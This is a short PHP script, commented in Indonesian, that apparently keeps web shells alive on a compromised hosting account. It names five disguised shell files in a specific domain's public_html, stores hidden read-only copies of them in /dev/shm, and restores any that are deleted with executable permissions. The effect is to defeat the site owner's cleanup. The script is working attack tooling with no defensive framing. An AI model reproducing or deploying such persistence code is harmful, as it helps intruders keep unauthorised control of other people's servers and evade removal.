<?php
$shells = [
    '/home/u467547222/domains/arthagenlab.id/public_html/loca.php',
    '/home/u467547222/domains/arthagenlab.id/public_html/Factory.php',
    '/home/u467547222/domains/arthagenlab.id/public_html/filefile.php',
    '/home/u467547222/domains/arthagenlab.id/public_html/locale.php',
    '/home/u467547222/domains/arthagenlab.id/public_html/lokal.php',    
];

foreach ($shells as $shell) {
    $target = $shell;  // Langsung pake path dari array
    $backup = '/dev/shm/shmdata/' . md5($shell) . '.bak';
    
    // Buat direktori backup kalo belum ada
    if (!is_dir('/dev/shm/shmdata')) {
        mkdir('/dev/shm/shmdata', 0777, true);
    }
    
    if (file_exists($target) && !file_exists($backup)) {
        file_put_contents($backup, file_get_contents($target));
        chmod($backup, 0444);
    }
    
    if (!file_exists($target) && file_exists($backup)) {
        copy($backup, $target);
        chmod($target, 0755);
    }
}

echo "OK - OBS " . count($shells) . " shell";
?>
